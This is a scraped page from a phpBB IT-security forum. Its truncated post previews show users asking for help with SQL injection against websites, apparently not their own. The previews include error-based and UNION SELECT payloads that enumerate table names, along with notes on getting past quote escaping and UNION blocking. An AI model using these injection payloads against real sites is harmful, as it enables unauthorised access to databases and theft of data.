|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 55
Members: 0
Total: 55
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
|
Hi..
I asked my friend to help me.. he gave me hint as follows
www.site.com/index.php?id=36 and+row(1,2)in(select+count(*),concat((select+table_name+from+information_ ... |
|
|
|
|
ya I tried....not working,
they are blocking UNION..throwing internal server error. |
|
|
|
|
Hi. I am stuck here..
I found a website with string based injection.
But whenever I add ' it gets replaced with \'
http://www.site.com/event.php?id=-8'+order+by+10-- -
I get following e ... |
|
|
|
|
Hi.. I was trying to inject this site
http://www.site.com/image.php?id=27
http://www.site.com/image.php?id=-27 UNION SELECT 1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14, ... |
|
|
Page 1 of 1 |
All times are GMT |
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|